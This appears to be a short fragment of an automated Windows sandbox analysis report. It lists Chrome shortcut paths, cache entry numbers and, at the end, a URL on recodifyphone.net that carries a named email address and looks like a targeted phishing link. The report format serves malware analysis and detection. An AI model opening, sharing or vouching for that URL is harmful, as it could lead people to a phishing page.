C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 82

Chrome Cache Entry: 84

Chrome Cache Entry: 87

Chrome Cache Entry: 89

Static File Info

Windows Analysis Report
http://1lyiqb.recodifyphone.net/#john.smith@ups.com